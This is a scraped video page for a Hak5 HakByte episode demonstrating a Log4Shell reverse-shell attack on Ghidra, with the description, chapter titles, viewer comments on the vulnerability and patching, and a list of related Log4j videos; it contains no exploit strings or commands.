How Hackers Exploit Log4J to Get a Reverse Shell (Ghidra Log4Shell Demo) | HakByte

Показать описание

On this episode of HakByte, @AlexLynd demonstrates a Log4Shell attack against Ghidra, and shows how a reverse shell can be established on compromised systems running the vulnerable Log4J Java framework.
This framework runs on millions of Java powered devices and was recently exploited, exposing a dangerous vulnerability that uses a single line of code to hack vulnerable systems.

Links:

Chapters:
Intro @AlexLynd 00:00
What is Log4J? 00:16
Log4Shell Exploit Explained 00:40
Vulnerable Programs 01:11
Set up the Log4Shell Demo 02:33
Create a Webserver 03:11
Netcat Reverse Shell Listener 04:01
Set up Log4Shell Demo 05:01
Log4Shell String Explained 05:45
Ghidra Setup 06:24
Log4Shell Attack Demo 07:01
Netcat Reverse Shell 07:39
Outro 08:00

Hak5 -- Cyber Security Education, Inspiration, News & Community since 2005:

-----☆-----☆-----☆-----☆-----☆-----☆-----☆-----☆-----☆-----☆
-----☆-----☆-----☆-----☆-----☆-----☆-----☆-----☆-----☆-----☆

____________________________________________
Founded in 2005, Hak5's mission is to advance the InfoSec industry. We do this through our award winning educational podcasts, leading pentest gear, and inclusive community – where all hackers belong.

Рекомендации по теме

Комментарии

I don't know what surprises me the most, the vulnerability itself, being that easy to explore, or how long it was unknown by the industry and community

cronus

“It ain’t gonna be that easy”

*“It’s that easy.”*

YISTECH

What's scary is that this RCE is so incredibly easy to do, and it's attacking something that is so widely used, you just know people had to have been using it for years without people knowing it! This kind of RCE is literally a once in a decade kind of find. Log4J is ran on so many things, it is impossible that they will all get patched, so this RCE will be valid for a long time to come.

bluegizmo

That was an amazing easy to follow up video. Congrats!

Ronoaldo

Been dealing with this all week at work. Its an easy enough fix but its just a pita to do all of em manually till they patch it in software

natewesselink

What companies allow access to unknown LDAP/LDAPS servers through their firewalls? This is the biggest security risk.

KangoV

I can't wait to explore this in my own home lab. It's insane how easy this exploit is and how prevalent this vulnerable application is.

npz

Great and timely video! I'm seeing a lot of problems relating to the updates More accurately the same problem with the same update from different users.

jmr

I could be mistaken but this looks like Oracle, who makes Java, failed to do input validation. Which is supposed to be a kind of security standard.

jonathanmcneill

I dont know how to thank you for this explanation, it was really hard to get what's going on, mostly on work where everyone is freaking out with this, now i have a more realistic understanding of the dangers of this CVE...
Thanks a lot!

aguadecanilla

So you're telling me log4j downloads unknown code from any LDAP server and executes it... why would they do that ?!

mehdiarmachi

I like the last statement. “Crimes are illegal” 😛

deathcoder

At the zoom in, Lynd should have said "because crimes are illegal" and wink with that "ding" sound you hear when the answer is right.

russell

thank you so much alex this topic is my project and my gatepass to be part of cyber security team, im suppose to report and replicate log4j attack but no luck in replicating using the minecraft but this definitely is the easiest and safest way. thank you you just save my career. God bless

TamTam-tgtd

nice video demo Alex. It would be cool if a line or two would be dedicated to see what shows up in the logfile (assuming that your logfile will not be destroyed by the Exploit)
detecting this in the logile is not so straightforward(depending on the application)

robvercouteren

Great tutorial Alex! The volume of vlog sounded a little low though.

juliusrowe

needed this video cause the hack the box walkthrough for Archetype was too big brain to understand well

alexandernguyen-phuoc

Really strange design decision for a logger, it must be a well-designed backdoor.

skepticalmind

I am curious what other triggers/codes are needed for this Ghidra server to be vulnerable. I notice that Qualys only marks log4j-core and log4j-api libraries; if a deployment only includes plain jar of log4j, Qualys will ignore it no matter the version.

YuanLiuTheDoc

Great explanation. Good video. Spidey approves

skerfreak

How Hackers Exploit Log4J to Get a Reverse Shell (Ghidra Log4Shell Demo) | HakByte

How Hackers Exploit Log4J to Get a Reverse Shell (Ghidra Log4Shell Demo) | HakByte

Log4j (CVE-2021-44228) RCE Vulnerability Explained

Exploits Explained: How Log4j, Buffer Overflows and Other Exploits Work

Why The Log4j Exploit Was So Dangerous

What We've Learned About The Log4J Exploits So Far

Log4J - CVE 2021-44228 (Log4Shell) - Exploitation & Mitigation

The Log4j Vulnerability Exploit Explained

Apache Log4j: The Exploit that Almost Killed the Internet

Log4j Vulnerability Could Give Hackers Control Over Millions of Devices

Log4J & JNDI Exploit: Why So Bad? - Computerphile

Exploiting log4j (CVE-2021-44228) RCE

Just the Tip: Log4j Exploit

Log4j Security Vulnerabilities - With Exploit POC /Live Demo

Log4J Exploit Explained: How it Works, In-Depth Examples, Mitigation, etc. | Log4Shell Vulnerability

Log4j Vulnerability (Log4Shell) Explained // CVE-2021-44228

CVE-2021-44228 Log4j Vulnerability Exploit Demo

Easy Log4J Exploit Detection with CanaryTokens | HakByte

CVE-2021-44228 - Log4j - Exploit Log4Shell (ITA)

Worst Zero Day Ever? Log4J vulnerability exposes billions of devices to hackers

Log4J vulnerability | Live Demonstration & Lab Configuration | Practical - Part 1

log4j RCE exploitation POC | log4shell exploitation | CVE-2021-44228

How does the Log4j CVE Work?

log4shell Explained | What, Why & How | Hacking using log4j vulnerability

CVE-2021-44228 - Log4j - MINECRAFT VULNERABLE! (and SO MUCH MORE)